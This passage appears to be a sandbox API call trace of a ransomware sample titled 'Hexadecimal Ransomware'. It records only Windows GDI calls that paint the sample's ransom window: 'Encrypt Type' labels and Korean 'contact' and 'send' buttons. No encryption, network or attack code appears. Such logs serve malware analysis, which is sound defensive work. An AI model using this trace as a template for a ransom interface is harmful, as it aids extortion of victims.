GetWindowTextLengthW (hWnd=0x102d2) returned 12 [0168.998] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xc [0168.998] GetSystemMetrics (nIndex=42) returned 0 [0168.998] GetWindowTextW (in: hWnd=0x102d2, lpString=0x11fe6ec, nMaxCount=13 | out: lpString="Encrypt Type") returned 12 [0168.998] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0xd, wParam=0xd, lParam=0x11fe6ec) returned 0xc [0168.998] GetClientRect (in: hWnd=0x102d2, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0168.998] GdipCreateRegion (region=0x11fe608) returned 0x0 [0168.998] GdipGetClip (graphics=0x6e25db8, region=0x6e1a000) returned 0x0 [0168.999] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0168.999] GdipGetWorldTransform (graphics=0x6e25db8, matrix=0x6e1a090) returned 0x0 [0168.999] GdipIsMatrixIdentity (matrix=0x6e1a090, result=0x11fe620) returned 0x0 [0168.999] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0168.999] GdipGetMatrixElements (matrix=0x6e1a090, matrixOut=0x1593ed8) returned 0x0 [0168.999] LocalFree (hMem=0x1593ed8) returned 0x0 [0168.999] GdipCombineRegionRegion (region=0x6e1a000, region2=0x6e19d10, combineMode=0x1) returned 0x0 [0168.999] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0168.999] GdipGetMatrixElements (matrix=0x6e1a090, matrixOut=0x1593ed8) returned 0x0 [0168.999] LocalFree (hMem=0x1593ed8) returned 0x0 [0168.999] GdipDeleteMatrix (matrix=0x6e1a090) returned 0x0 [0168.999] GdipIsInfiniteRegion (region=0x6e1a000, graphics=0x6e25db8, result=0x11fe648) returned 0x0 [0168.999] GdipIsInfiniteRegion (region=0x6e1a000, graphics=0x6e25db8, result=0x11fe638) returned 0x0 [0168.999] GdipGetRegionHRgn (region=0x6e1a000, graphics=0x6e25db8, hRgn=0x11fe638) returned 0x0 [0168.999] GdipDeleteRegion (region=0x6e1a000) returned 0x0 [0168.999] GdipGetDC (graphics=0x6e25db8, hdc=0x11fe650) returned 0x0 [0168.999] GetCurrentObject (hdc=0x1b010821, type=0x1) returned 0xb00017 [0168.999] GetCurrentObject (hdc=0x1b010821, type=0x2) returned 0x900010 [0168.999] GetCurrentObject (hdc=0x1b010821, type=0x7) returned 0xb050815 [0169.000] GetCurrentObject (hdc=0x1b010821, type=0x6) returned 0x8a01c2 [0169.000] SaveDC (hdc=0x1b010821) returned 1 [0169.000] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1d040822 [0169.000] GetClipRgn (hdc=0x1b010821, hrgn=0x1d040822) returned 0 [0169.000] SelectClipRgn (hdc=0x1b010821, hrgn=0x1a040825) returned 2 [0169.000] DeleteObject (ho=0x1d040822) returned 1 [0169.000] DeleteObject (ho=0x1a040825) returned 1 [0169.000] OffsetViewportOrgEx (in: hdc=0x1b010821, x=0, y=0, lppt=0x3341f8c | out: lppt=0x3341f8c) returned 1 [0169.000] GetNearestColor (hdc=0x1b010821, color=0x800000) returned 0x800000 [0169.000] CreateSolidBrush (color=0x800000) returned 0x15100826 [0169.000] FillRect (hDC=0x1b010821, lprc=0x11fe654, hbr=0x15100826) returned 1 [0169.002] DeleteObject (ho=0x15100826) returned 1 [0169.002] RestoreDC (hdc=0x1b010821, nSavedDC=-1) returned 1 [0169.002] GdipReleaseDC (graphics=0x6e25db8, hdc=0x1b010821) returned 0x0 [0169.002] GdipRestoreGraphics (graphics=0x6e25db8, state=0xfda10dbd) returned 0x0 [0169.002] GdipDeleteRegion (region=0x6e19d10) returned 0x0 [0169.003] GetWindowTextLengthW (hWnd=0x102d2) returned 12 [0169.003] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xc [0169.003] GetSystemMetrics (nIndex=42) returned 0 [0169.003] GetWindowTextW (in: hWnd=0x102d2, lpString=0x11fe6ec, nMaxCount=13 | out: lpString="Encrypt Type") returned 12 [0169.003] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0xd, wParam=0xd, lParam=0x11fe6ec) returned 0xc [0169.003] GdipGetDC (graphics=0x6e25db8, hdc=0x11fe670) returned 0x0 [0169.003] GetCurrentObject (hdc=0x1b010821, type=0x1) returned 0xb00017 [0169.003] GetCurrentObject (hdc=0x1b010821, type=0x2) returned 0x900010 [0169.003] GetCurrentObject (hdc=0x1b010821, type=0x7) returned 0xb050815 [0169.003] GetCurrentObject (hdc=0x1b010821, type=0x6) returned 0x8a01c2 [0169.003] SaveDC (hdc=0x1b010821) returned 1 [0169.004] GetNearestColor (hdc=0x1b010821, color=0x800000) returned 0x800000 [0169.004] RestoreDC (hdc=0x1b010821, nSavedDC=-1) returned 1 [0169.004] GdipReleaseDC (graphics=0x6e25db8, hdc=0x1b010821) returned 0x0 [0169.004] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0169.004] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0169.004] GdipGetTextRenderingHint (graphics=0x6e25db8, mode=0x11fe610) returned 0x0 [0169.004] GdipGetDC (graphics=0x6e25db8, hdc=0x11fe5fc) returned 0x0 [0169.005] GetCurrentObject (hdc=0x1b010821, type=0x1) returned 0xb00017 [0169.005] GetCurrentObject (hdc=0x1b010821, type=0x2) returned 0x900010 [0169.005] GetCurrentObject (hdc=0x1b010821, type=0x7) returned 0xb050815 [0169.005] GetCurrentObject (hdc=0x1b010821, type=0x6) returned 0x8a01c2 [0169.005] SaveDC (hdc=0x1b010821) returned 1 [0169.005] GetTextAlign (hdc=0x1b010821) returned 0x0 [0169.005] GetTextColor (hdc=0x1b010821) returned 0x0 [0169.005] SetTextColor (hdc=0x1b010821, color=0x2b0000) returned 0x0 [0169.005] GetCurrentObject (hdc=0x1b010821, type=0x6) returned 0x8a01c2 [0169.005] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0169.006] SelectObject (hdc=0x1b010821, h=0x4f0a07d0) returned 0x8a01c2 [0169.006] GetBkMode (hdc=0x1b010821) returned 2 [0169.006] SetBkMode (hdc=0x1b010821, mode=1) returned 2 [0169.006] DrawTextExW (in: hdc=0x1b010821, lpchText="Encrypt Type", cchText=12, lprc=0x11fe590, format=0x0, lpdtp=0x3342450 | out: lpchText="Encrypt Type", lprc=0x11fe590) returned 18 [0169.007] RestoreDC (hdc=0x1b010821, nSavedDC=-1) returned 1 [0169.007] GdipReleaseDC (graphics=0x6e25db8, hdc=0x1b010821) returned 0x0 [0169.007] GdipGetDC (graphics=0x6e25db8, hdc=0x11fe7ac) returned 0x0 [0169.007] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=94, cy=18, hdcSrc=0x1b010821, x1=0, y1=0, rop=0xcc0020) returned 1 [0169.007] GdipReleaseDC (graphics=0x6e25db8, hdc=0x1b010821) returned 0x0 [0169.007] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0169.007] SelectObject (hdc=0x1b010821, h=0x85000f) returned 0xb050815 [0169.008] DeleteDC (hdc=0x1b010821) returned 1 [0169.008] GdipDeleteGraphics (graphics=0x6e25db8) returned 0x0 [0169.008] EndPaint (hWnd=0x102d2, lpPaint=0x11fe750) returned 1 [0169.008] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.008] IsWindowUnicode (hWnd=0x102d4) returned 1 [0169.008] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.008] TranslateMessage (lpMsg=0x11fed00) returned 0 [0169.008] DispatchMessageW (lpMsg=0x11fed00) returned 0x1 [0169.008] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0xf, wParam=0x0, lParam=0x0) returned 0x1 [0169.008] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x1 [0169.008] SetTextColor (hdc=0x10105d6, color=0x0) returned 0x0 [0169.008] SetBkColor (hdc=0x10105d6, color=0xffffff) returned 0xffffff [0169.010] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fdd74 | out: lpwndpl=0x11fdd74) returned 1 [0169.010] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fdd20 | out: lpRect=0x11fdd20) returned 1 [0169.010] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0169.010] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0169.010] GetSystemMetrics (nIndex=42) returned 0 [0169.010] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdbc8, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0169.010] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdbc8) returned 0x16 [0169.010] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fdc28 | out: lpRect=0x11fdc28) returned 1 [0169.010] GetCurrentObject (hdc=0x1e010821, type=0x1) returned 0xb00017 [0169.010] GetCurrentObject (hdc=0x1e010821, type=0x2) returned 0x900010 [0169.010] GetCurrentObject (hdc=0x1e010821, type=0x7) returned 0x2905081f [0169.010] GetCurrentObject (hdc=0x1e010821, type=0x6) returned 0x8a01c2 [0169.010] SaveDC (hdc=0x1e010821) returned 1 [0169.011] GetNearestColor (hdc=0x1e010821, color=0x0) returned 0x0 [0169.011] CreateSolidBrush (color=0x0) returned 0x16100826 [0169.011] FillRect (hDC=0x1e010821, lprc=0x11fdac8, hbr=0x16100826) returned 1 [0169.011] DeleteObject (ho=0x16100826) returned 1 [0169.011] RestoreDC (hdc=0x1e010821, nSavedDC=-1) returned 1 [0169.011] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0169.011] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0169.011] GetSystemMetrics (nIndex=42) returned 0 [0169.011] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdb68, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0169.011] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdb68) returned 0x16 [0169.011] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fdbc8 | out: lpRect=0x11fdbc8) returned 1 [0169.011] GetCurrentObject (hdc=0x1e010821, type=0x1) returned 0xb00017 [0169.011] GetCurrentObject (hdc=0x1e010821, type=0x2) returned 0x900010 [0169.011] GetCurrentObject (hdc=0x1e010821, type=0x7) returned 0x2905081f [0169.011] GetCurrentObject (hdc=0x1e010821, type=0x6) returned 0x8a01c2 [0169.011] SaveDC (hdc=0x1e010821) returned 1 [0169.011] GetNearestColor (hdc=0x1e010821, color=0x0) returned 0x0 [0169.011] CreateSolidBrush (color=0x0) returned 0x17100826 [0169.012] FillRect (hDC=0x1e010821, lprc=0x11fda68, hbr=0x17100826) returned 1 [0169.012] DeleteObject (ho=0x17100826) returned 1 [0169.012] RestoreDC (hdc=0x1e010821, nSavedDC=-1) returned 1 [0169.012] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0169.012] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0169.012] GetSystemMetrics (nIndex=42) returned 0 [0169.012] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdb68, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0169.012] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdb68) returned 0x16 [0169.013] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x14, wParam=0x10105d6, lParam=0x0) returned 0x1 [0169.013] SetTextColor (hdc=0x1f010821, color=0x0) returned 0x0 [0169.013] SetBkColor (hdc=0x1f010821, color=0xffffff) returned 0xffffff [0169.014] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.014] IsWindowUnicode (hWnd=0x102d6) returned 1 [0169.014] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.014] TranslateMessage (lpMsg=0x11fed00) returned 0 [0169.014] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0169.014] BeginPaint (in: hWnd=0x102d6, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0x10105d6 [0169.014] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0169.014] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0169.015] CreateCompatibleDC (hdc=0x10105d6) returned 0x58010800 [0169.015] SelectObject (hdc=0x58010800, h=0xb050815) returned 0x85000f [0169.015] GdipCreateFromHDC (hdc=0x58010800, graphics=0x11fe76c) returned 0x0 [0169.015] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0169.015] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=60, height=18, combineMode=0x0) returned 0x0 [0169.015] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0169.015] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0169.015] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7cc) returned 0x0 [0169.015] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0169.015] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ea0) returned 0x0 [0169.015] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.015] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0169.015] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0169.015] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0169.015] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7c0) returned 0x0 [0169.015] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7ec) returned 0x0 [0169.015] GetWindowTextLengthW (hWnd=0x102d6) returned 4 [0169.016] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0169.016] GetSystemMetrics (nIndex=42) returned 0 [0169.016] GetWindowTextW (in: hWnd=0x102d6, lpString=0x11fe6fc, nMaxCount=5 | out: lpString="문의하기") returned 4 [0169.016] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0xd, wParam=0x5, lParam=0x11fe6fc) returned 0x4 [0169.016] GetClientRect (in: hWnd=0x102d6, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0169.016] GdipCreateRegion (region=0x11fe608) returned 0x0 [0169.016] GdipGetClip (graphics=0x6e19d80, region=0x6e1a380) returned 0x0 [0169.016] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0169.016] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a410) returned 0x0 [0169.016] GdipIsMatrixIdentity (matrix=0x6e1a410, result=0x11fe620) returned 0x0 [0169.016] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.016] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ae8) returned 0x0 [0169.016] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.016] GdipCombineRegionRegion (region=0x6e1a380, region2=0x6e1a090, combineMode=0x1) returned 0x0 [0169.016] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0169.016] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593c38) returned 0x0 [0169.017] LocalFree (hMem=0x1593c38) returned 0x0 [0169.017] GdipDeleteMatrix (matrix=0x6e1a410) returned 0x0 [0169.017] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe648) returned 0x0 [0169.017] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe638) returned 0x0 [0169.017] GdipGetRegionHRgn (region=0x6e1a380, graphics=0x6e19d80, hRgn=0x11fe638) returned 0x0 [0169.017] GdipDeleteRegion (region=0x6e1a380) returned 0x0 [0169.017] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe650) returned 0x0 [0169.017] GetCurrentObject (hdc=0x58010800, type=0x1) returned 0xb00017 [0169.017] GetCurrentObject (hdc=0x58010800, type=0x2) returned 0x900010 [0169.017] GetCurrentObject (hdc=0x58010800, type=0x7) returned 0xb050815 [0169.017] GetCurrentObject (hdc=0x58010800, type=0x6) returned 0x8a01c2 [0169.017] SaveDC (hdc=0x58010800) returned 1 [0169.018] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xe04081c [0169.018] GetClipRgn (hdc=0x58010800, hrgn=0xe04081c) returned 0 [0169.018] SelectClipRgn (hdc=0x58010800, hrgn=0x1f040825) returned 2 [0169.018] DeleteObject (ho=0xe04081c) returned 1 [0169.018] DeleteObject (ho=0x1f040825) returned 1 [0169.018] OffsetViewportOrgEx (in: hdc=0x58010800, x=0, y=0, lppt=0x3342e5c | out: lppt=0x3342e5c) returned 1 [0169.018] GetNearestColor (hdc=0x58010800, color=0xdb7093) returned 0xdb7093 [0169.018] CreateSolidBrush (color=0xdb7093) returned 0x18100826 [0169.018] FillRect (hDC=0x58010800, lprc=0x11fe654, hbr=0x18100826) returned 1 [0169.018] DeleteObject (ho=0x18100826) returned 1 [0169.018] RestoreDC (hdc=0x58010800, nSavedDC=-1) returned 1 [0169.018] GdipReleaseDC (graphics=0x6e19d80, hdc=0x58010800) returned 0x0 [0169.018] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd9f0dbd) returned 0x0 [0169.018] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0169.018] GetWindowTextLengthW (hWnd=0x102d6) returned 4 [0169.018] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0169.018] GetSystemMetrics (nIndex=42) returned 0 [0169.018] GetWindowTextW (in: hWnd=0x102d6, lpString=0x11fe6fc, nMaxCount=5 | out: lpString="문의하기") returned 4 [0169.018] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0xd, wParam=0x5, lParam=0x11fe6fc) returned 0x4 [0169.019] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe670) returned 0x0 [0169.019] GetCurrentObject (hdc=0x58010800, type=0x1) returned 0xb00017 [0169.019] GetCurrentObject (hdc=0x58010800, type=0x2) returned 0x900010 [0169.019] GetCurrentObject (hdc=0x58010800, type=0x7) returned 0xb050815 [0169.019] GetCurrentObject (hdc=0x58010800, type=0x6) returned 0x8a01c2 [0169.019] SaveDC (hdc=0x58010800) returned 1 [0169.019] GetNearestColor (hdc=0x58010800, color=0xffffff) returned 0xffffff [0169.019] RestoreDC (hdc=0x58010800, nSavedDC=-1) returned 1 [0169.019] GdipReleaseDC (graphics=0x6e19d80, hdc=0x58010800) returned 0x0 [0169.019] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0169.020] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0169.020] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe610) returned 0x0 [0169.020] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5fc) returned 0x0 [0169.020] GetCurrentObject (hdc=0x58010800, type=0x1) returned 0xb00017 [0169.020] GetCurrentObject (hdc=0x58010800, type=0x2) returned 0x900010 [0169.020] GetCurrentObject (hdc=0x58010800, type=0x7) returned 0xb050815 [0169.020] GetCurrentObject (hdc=0x58010800, type=0x6) returned 0x8a01c2 [0169.020] SaveDC (hdc=0x58010800) returned 1 [0169.020] GetTextAlign (hdc=0x58010800) returned 0x0 [0169.020] GetTextColor (hdc=0x58010800) returned 0x0 [0169.020] SetTextColor (hdc=0x58010800, color=0xffffff) returned 0x0 [0169.020] GetCurrentObject (hdc=0x58010800, type=0x6) returned 0x8a01c2 [0169.020] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0169.020] SelectObject (hdc=0x58010800, h=0x4f0a07d0) returned 0x8a01c2 [0169.020] GetBkMode (hdc=0x58010800) returned 2 [0169.020] SetBkMode (hdc=0x58010800, mode=1) returned 2 [0169.021] DrawTextExW (in: hdc=0x58010800, lpchText="문의하기", cchText=4, lprc=0x11fe590, format=0x0, lpdtp=0x3343314 | out: lpchText="문의하기", lprc=0x11fe590) returned 18 [0169.023] RestoreDC (hdc=0x58010800, nSavedDC=-1) returned 1 [0169.023] GdipReleaseDC (graphics=0x6e19d80, hdc=0x58010800) returned 0x0 [0169.023] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7ac) returned 0x0 [0169.023] BitBlt (hdc=0x10105d6, x=0, y=0, cx=60, cy=18, hdcSrc=0x58010800, x1=0, y1=0, rop=0xcc0020) returned 1 [0169.023] GdipReleaseDC (graphics=0x6e19d80, hdc=0x58010800) returned 0x0 [0169.023] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0169.023] SelectObject (hdc=0x58010800, h=0x85000f) returned 0xb050815 [0169.023] DeleteDC (hdc=0x58010800) returned 1 [0169.023] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0169.023] EndPaint (hWnd=0x102d6, lpPaint=0x11fe750) returned 1 [0169.024] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.024] IsWindowUnicode (hWnd=0x102d8) returned 1 [0169.024] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.024] TranslateMessage (lpMsg=0x11fed00) returned 0 [0169.024] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0169.024] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0x10105d6 [0169.024] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0169.024] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x14, wParam=0x10105d6, lParam=0x0) returned 0x1 [0169.024] GetStockObject (i=5) returned 0x900015 [0169.025] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0169.025] CreateCompatibleDC (hdc=0x10105d6) returned 0x5b010800 [0169.025] SelectObject (hdc=0x5b010800, h=0xb050815) returned 0x85000f [0169.025] GdipCreateFromHDC (hdc=0x5b010800, graphics=0x11fe760) returned 0x0 [0169.025] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0169.025] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0169.025] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0169.025] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0169.025] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7c0) returned 0x0 [0169.025] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.025] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ae8) returned 0x0 [0169.025] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.025] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0169.026] GdipCreateRegion (region=0x11fe7a8) returned 0x0 [0169.026] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0169.026] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7b4) returned 0x0 [0169.026] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7e0) returned 0x0 [0169.026] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd9d0dbd) returned 0x0 [0169.026] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0169.026] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5cc) returned 0x0 [0169.026] GetCurrentObject (hdc=0x5b010800, type=0x1) returned 0xb00017 [0169.026] GetCurrentObject (hdc=0x5b010800, type=0x2) returned 0x900010 [0169.026] GetCurrentObject (hdc=0x5b010800, type=0x7) returned 0xb050815 [0169.026] GetCurrentObject (hdc=0x5b010800, type=0x6) returned 0x8a01c2 [0169.026] SaveDC (hdc=0x5b010800) returned 1 [0169.026] GetNearestColor (hdc=0x5b010800, color=0x0) returned 0x0 [0169.213] GetNearestColor (hdc=0x5b010800, color=0x0) returned 0x0 [0169.214] GetNearestColor (hdc=0x5b010800, color=0x0) returned 0x0 [0169.214] GetNearestColor (hdc=0x5b010800, color=0x989898) returned 0x989898 [0169.214] GetNearestColor (hdc=0x5b010800, color=0x0) returned 0x0 [0169.214] GetNearestColor (hdc=0x5b010800, color=0x7f7f7f) returned 0x7f7f7f [0169.214] GetNearestColor (hdc=0x5b010800, color=0x989898) returned 0x989898 [0169.214] GetNearestColor (hdc=0x5b010800, color=0x0) returned 0x0 [0169.214] GetNearestColor (hdc=0x5b010800, color=0x0) returned 0x0 [0169.214] RestoreDC (hdc=0x5b010800, nSavedDC=-1) returned 1 [0169.214] GdipReleaseDC (graphics=0x6e19d80, hdc=0x5b010800) returned 0x0 [0169.214] IsAppThemed () returned 0x1 [0169.214] GetThemeAppProperties () returned 0x3 [0169.214] GetThemeAppProperties () returned 0x3 [0169.215] IsAppThemed () returned 0x1 [0169.215] GetThemeAppProperties () returned 0x3 [0169.215] GetThemeAppProperties () returned 0x3 [0169.215] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x2415, lpdtp=0x3343b30 | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0169.216] IsAppThemed () returned 0x1 [0169.216] GetThemeAppProperties () returned 0x3 [0169.216] GetThemeAppProperties () returned 0x3 [0169.216] IsAppThemed () returned 0x1 [0169.216] GetThemeAppProperties () returned 0x3 [0169.216] GetThemeAppProperties () returned 0x3 [0169.216] GetFocus () returned 0x0 [0169.216] IsAppThemed () returned 0x1 [0169.216] GetThemeAppProperties () returned 0x3 [0169.217] GetThemeAppProperties () returned 0x3 [0169.217] IsAppThemed () returned 0x1 [0169.217] GetThemeAppProperties () returned 0x3 [0169.217] GetThemeAppProperties () returned 0x3 [0169.217] IsThemePartDefined () returned 0x1 [0169.217] IsAppThemed () returned 0x1 [0169.217] GetThemeAppProperties () returned 0x3 [0169.217] GetThemeAppProperties () returned 0x3 [0169.217] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0169.217] IsAppThemed () returned 0x1 [0169.217] GetThemeAppProperties () returned 0x3 [0169.217] GetThemeAppProperties () returned 0x3 [0169.217] IsAppThemed () returned 0x1 [0169.217] GetThemeAppProperties () returned 0x3 [0169.217] GetThemeAppProperties () returned 0x3 [0169.217] IsThemePartDefined () returned 0x1 [0169.217] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0169.217] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0169.218] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0169.218] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0169.218] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe4e8) returned 0x0 [0169.218] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0169.218] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593c38) returned 0x0 [0169.218] LocalFree (hMem=0x1593c38) returned 0x0 [0169.218] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.218] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ae8) returned 0x0 [0169.218] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.218] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0169.218] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe510) returned 0x0 [0169.218] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe500) returned 0x0 [0169.218] GdipGetRegionHRgn (region=0x6e1a090, graphics=0x6e19d80, hRgn=0x11fe500) returned 0x0 [0169.218] GdipDeleteRegion (region=0x6e1a090) 